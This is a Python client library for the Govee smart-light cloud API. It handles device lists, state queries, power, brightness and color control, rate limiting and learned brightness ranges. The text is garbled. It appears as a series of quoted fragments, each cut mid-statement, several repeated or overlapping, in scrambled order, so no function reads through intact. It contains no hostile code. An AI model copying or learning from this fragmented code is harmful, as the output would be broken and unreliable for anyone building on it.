"Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str, device = self._get_device(device) result", "= None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err =", "self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err async def set_color(", "device.retrievable: # device {device_str} isn't able to return state, return 'history' state self._devices[device_str].source", "setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True", "def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\" return self._limit_reset -", "def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def", "await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) # we got something,", "didn't get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254 await", "\"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when", "without using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return", "this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property", "result = self._devices[device_str] elif seconds_locked: # we just changed something, return state from", "VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL =", "turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return success", "brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we", "# set brightness as 0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result", "device_str, device = self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\"", "bool support_color: bool support_color_tem: bool online: bool power_state: bool brightness: int color: Tuple[int,", "-> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO. returns: device_address,", "int((time.time() - start) * 1000) if response.status == 200: if \"Pong\" == result:", "and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 # assumption, as we", "a success result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\" async def", "is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in device.support_cmds:", "self._devices[device_str].color_temp = color_temp return success, err async def set_color( self, device: Union[str, GoveeDevice],", "brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if", "self._learning_storage._read_cached() changed = False # init Dict and entry for device if learning_infos", "return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: # we", "self._learning_storage = learning_storage if not self._learning_storage: # use an internal learning storage as", "'{prop}'\") if not prop_online: if self.config_offline_is_off is not None: # global option if", "from typing import Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import", "*, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda:", "\"\"\"UTC time in seconds when the rate limit will be reset.\"\"\" return self._limit_reset", "result, err = await self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max", "\"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None if not", "UTC epoch seconds. # return state from hisory for n seconds after controlling", "List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state: bool", "by some conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\":", "= \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err", "= max(1, delay) else: err = f\"API-Result wrong: {result}\" else: result = await", "else: if len(color) != 3: err = f\"set_color: invalid value {color}, must be", "result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error", "possible: {err}\") return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for", "return device @property def online(self): \"\"\"Last request was able to connect to the", "contextlib import asynccontextmanager from dataclasses import dataclass from datetime import datetime from events", "str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success = False err =", "return seconds_lock async def _control( self, device: Union[str, GoveeDevice], command: str, params: Any", "return success and error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device:", "do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning(", "( device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100", "device {device_str}, {device}\" else: if not device.controllable: err = f\"Device {device.device} is not", "not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and learn", "GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called by turn_on and", "{device_str}, {device}\" else: if not device.controllable: err = f\"Device {device.device} is not controllable\"", "@asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This also", "if not prop_online: if self.config_offline_is_off is not None: # global option if self.config_offline_is_off:", "not device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible:", "this is the learning config, possibly overridden by a global config class GoveeError(Exception):", "as 0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err =", "learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err = f\"API-Error {response.status}:", "self.__aenter__() return self async def close(self): \"\"\"Use close when your are finished with", "= await self._control(device, command, params) success = False if not err: success =", "message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool,", "err: # try again with 0-100 range if \"API-Error 400\" in err: #", "+ DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await", "seconds_lock < 0: seconds_lock = 0 return seconds_lock async def _control( self, device:", "if response.status == 200: if \"Pong\" == result: ping_ok_delay = max(1, delay) else:", "_set_online(self, online: bool): \"\"\"Set the online state and fire an event on change.\"\"\"", "None or ( device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max =", "Set global behavour when device is offline. None: default, use config_offline_is_off from learning,", "async def _control( self, device: Union[str, GoveeDevice], command: str, params: Any ) ->", "json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put(", "else: text = await response.text() err = f\"API-Error {response.status} on command {cmd}: {text}", "by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device if", "when the rate limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds", "* 254 / 100 ) result = self._devices[device_str] result.online = prop_online result.power_state =", "err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\"", "else: command = \"colorTem\" result, err = await self._control(device, command, color_temp) if not", "else: result = await response.text() err = f\"API-Error {response.status}: {result}\" # cache last", "command, color_temp) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow", "red, \"g\": green, \"b\": blue} result, err = await self._control(device, command, command_color) if", "command = \"brightness\" result, err = await self._control(device, command, brightness_set) if err: #", "device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is assumed. If the brightness", "None if not device: err = f\"Invalid device {device_str}, {device}\" else: if not", "5, which means there is some room for other clients. \"\"\" return self._rate_limit_on", "100: # scale range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness *", "connect to the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the online", "= self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self,", "prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp", "an offline device is shown as off. \"\"\" self._config_offline_is_off = val @property def", "assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on =", "self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return success,", "400\" in err: # Unsupported Cmd Value # set brightness as 0..100 as", "= self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next state for {device.device}", "{device_str}, {device}\" else: command = \"turn\" params = onOff result, err = await", "await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]:", "defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None,", "= time.time() ping_ok_delay = None err = None async with self._api_get(url=_API_PING, auth=False) as", ") as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling", "await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if", "\"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee", ") ) as response: yield response @asynccontextmanager async def _api_get(self, *, auth=True, url:", "response yield response except aiohttp.ClientError as ex: # we are offline self._set_online(False) err", "{device_str} not possible: {err}\") elif not command in device.support_cmds: err = f\"Command {command}", "auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return", "elif isinstance(device, str) and device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str)", "self.rate_limit_on: # do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec >", "color[0] green = color[1] blue = color[2] if red < 0 or red", "int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g, b) where each", "== 429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices also utilize the", "rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if other", "int color: Tuple[int, int, int] color_temp: int timestamp: int source: str error: str", "def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev in", "the rate limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until", "__init__(self, err_msg): self._err_msg = err_msg status = -1 async def text(self): return self._err_msg", "command, brightness_set ) if not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if", "return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit", "True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in", "returned from API: {json_obj}, resulting state object: {result}\" ) else: errText = await", "learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str =", "# defaults by some conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str", "= color return success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds", "option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour", "_RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests you're permitted to make", "= \"error from aiohttp: %s\" % repr(ex) except Exception as ex: err =", "Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start =", "= _API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\"", "else: err = f\"API-Result wrong: {result}\" else: result = await response.text() err =", "import dataclass from datetime import datetime from events import Events from typing import", "err = None await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) #", "import time import math from contextlib import asynccontextmanager from dataclasses import dataclass from", "import math from contextlib import asynccontextmanager from dataclasses import dataclass from datetime import", "Value # set brightness as 0..100 as 0..254 didn't work brightness_set = brightness_set_100", "\"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err):", "for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err =", "brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control( device, command,", "trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def", "in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining =", "_, device = self._get_device(device) return device @property def online(self): \"\"\"Last request was able", "error: %s\" % repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg =", "device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in", "brightness_set ) if not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set", "manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use", "= prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\"", "or green > 255: err = f\"set_color: invalid value {color}, green must be", "actual brightness pull the brightness up to max once.\", device.device, ) changed =", "invalid value {color}, must be tuple with (r, g, b) values\" else: red", "isinstance(device, GoveeDevice): device_str = device.device if not device_str in self._devices: device = None", "the govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and", "and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume", "not device: err = f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params", "GoveeLearnedInfo() # output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max", "\"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL", "= val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = []", "response.text() err = f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices =", "f\"Invalid device {device_str}, {device}\" else: if brightness < 0 or brightness > 254:", "as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all", "response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str", "None, ): \"\"\"Use create method if you want to use this Client without", "# assume we are online self.events = Events() self._api_key = api_key self._devices =", "self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining}", "to 2000-9000.\"\"\" success = False err = None device_str, device = self._get_device(device) if", "return self._online def _set_online(self, online: bool): \"\"\"Set the online state and fire an", "API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True #", "{} @asynccontextmanager async def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put", "brightness up to max once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max", "endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err", "err = f\"set_color: invalid value {color}, blue must be within 0 .. 254\"", "for device_str in self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting", "== 100 and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 # assumption,", "and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async with self._api_get(url=_API_DEVICES)", "didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control(", "GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model: str device_name: str controllable:", "= prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], )", "\"history\" self._devices[device_str].color_temp = color_temp return success, err async def set_color( self, device: Union[str,", "time in seconds when the rate limit will be reset.\"\"\" return self._limit_reset @property", "254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100: #", "{} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was", "for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down", "0 return seconds_lock async def _control( self, device: Union[str, GoveeDevice], command: str, params:", "{brightness}, allowed range 0 .. 254\" else: if brightness > 0 and device.before_set_brightness_turn_on:", "in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self,", "Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and storage for learned values.\"\"\"", "100: device.learned_set_brightness_max = 254 await self._learn(device) if not err: success = self._is_success_result_message(result) if", "_LOGGER.debug( \"learned device %s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, )", "color return success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to", "def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This also handles: -", "offline for device in self.devices: device.online = False async def check_connection(self) -> bool:", "is the learning config, possibly overridden by a global config class GoveeError(Exception): \"\"\"Base", "from hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 #", "may be in range 0-255 \"\"\" success = False err = None device_str,", "response.json() else: text = await response.text() err = f\"API-Error {response.status} on command {cmd}:", "{response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and", "text = await response.text() err = f\"API-Error {response.status} on command {cmd}: {text} for", "device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) ->", "None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state # defaults by", "{device}\" else: if not device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control", "# API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number", "to 5, which means there is some room for other clients. \"\"\" return", "await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn", "= await self._control(device, command, command_color) if not err: success = self._is_success_result_message(result) if success:", "brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100: # set", "return self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await", "rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\" # do we have", "= prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state", "waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await", "int source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int", "( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ):", "online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max,", "err = f\"Invalid device {device_str}, {device}\" else: if brightness < 0 or brightness", "return success and error message.\"\"\" return await self._turn(device, \"off\") async def _turn( self,", "= err else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices async def", "rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit will be reset.\"\"\" return", "the online state and fire an event on change.\"\"\" if self._online != online:", "(0, 0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these", "\"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0:", "GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str, device", "return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate", "re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key:", "raise GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on = val @property", "handles: - rate-limiting - online/offline status \"\"\" err = None await self.rate_limit_delay() try:", "device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on", "= None if not device: err = f\"Invalid device {device_str}, {device}\" else: if", "bool brightness: int color: Tuple[int, int, int] color_temp: int timestamp: int source: str", "history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache:", "with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response", "with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result = await response.json() timestamp", "False # effenctive state # defaults by some conditions if not is_retrievable: learned_get_brightness_max", "def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\" # do we", "# learning option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max == None", "prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp =", "0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else:", "\"\"\"Helper method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response):", "storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we", "# return the async content manager response yield response except aiohttp.ClientError as ex:", "limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the current rate", "in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0,", "learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and learn if (", "green > 255: err = f\"set_color: invalid value {color}, green must be within", "= \"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err async def set_brightness(", "\"\"\" device: str model: str device_name: str controllable: bool retrievable: bool support_cmds: List[str]", "learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off", "self._control(device, command, command_color) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp =", "Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API", "window resets in UTC epoch seconds. # return state from hisory for n", "= err_msg status = -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \"", "else: red = color[0] green = color[1] blue = color[2] if red <", "_control( self, device: Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]:", "fire an event on change.\"\"\" if self._online != online: self._online = online #", "response: if response.status == 200: timestamp = self._utcnow() json_obj = await response.json() prop_online", "self._get_device(device) return device @property def online(self): \"\"\"Last request was able to connect to", "\"Rate-Limit-Remaining\" # The number of requests remaining in the current rate limit window.", "return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True, url: str,", "_LOGGER.info( \"brightness range for %s is assumed. If the brightness slider doesn't match", "( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text = await", "\"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in", "): _LOGGER.debug( \"learned device %s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max,", "= \"Rate-Limit-Remaining\" # The number of requests remaining in the current rate limit", "model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured values if device_str in", "limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests you're", "elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\"", "2000-9000\" else: command = \"colorTem\" result, err = await self._control(device, command, color_temp) if", "= 254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100 up", "= True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def", "> 100 ): device.learned_get_brightness_max = ( 100 # assumption, as we didn't get", "get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device)", "self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get", "try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit", "wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock = 0", "DTO. returns: device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str =", "0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set >", "prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"],", "online: bool): \"\"\"Set the online state and fire an event on change.\"\"\" if", "self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return", "if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if not err: success", "254\" else: command = \"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue}", "err, ) self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error = None return", "\"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state,", "get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\"", "if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success,", "the rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self):", "_API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\"", "\"\"\"Turn off a device, return success and error message.\"\"\" return await self._turn(device, \"off\")", "= color_temp return success, err async def set_color( self, device: Union[str, GoveeDevice], color:", "= f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\")", "device %s: %s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] = state", "err = ( f\"set_color: invalid value {color}, red must be within 0 ..", "( f\"set_color: invalid value {color}, red must be within 0 .. 254\" )", "typing import Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION", "str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool", "self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific", "be tuple with (r, g, b) values\" else: red = color[0] green =", "exceeded, check if other devices also utilize the govee API\" ) limit_unknown =", "from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed =", "brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set > 0:", "time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *,", "seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked}", "have requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep?", "if response.status == 200: timestamp = self._utcnow() json_obj = await response.json() prop_online =", "elif not command in device.support_cmds: err = f\"Command {command} not possible on device", "rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds", "processes self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None", "{device_str}, {device}\" else: if brightness < 0 or brightness > 254: err =", "seconds when the rate limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self):", "0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one", "= False prop_brightness = False prop_color = (0, 0, 0) prop_color_temp = 0", "error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off:", "calls that trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter", "{color}, blue must be within 0 .. 254\" else: command = \"color\" command_color", "if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if", "result = None err = None if not device: err = f\"Invalid device", "for device %s: %s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] =", "from dataclasses import dataclass from datetime import datetime from events import Events from", "device_str = device if isinstance(device, GoveeDevice): device_str = device.device if not device_str in", "Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success = False err", "_api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This also handles: - rate-limiting", "# disallow unknown devices elif isinstance(device, str) and device_str in self._devices: device =", "response: if response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until", "the brightness up to max once.\", device.device, ) changed = True learning_infos[ device.device", "result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp", "brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err = await", "remaining: {self._limit_remaining} in 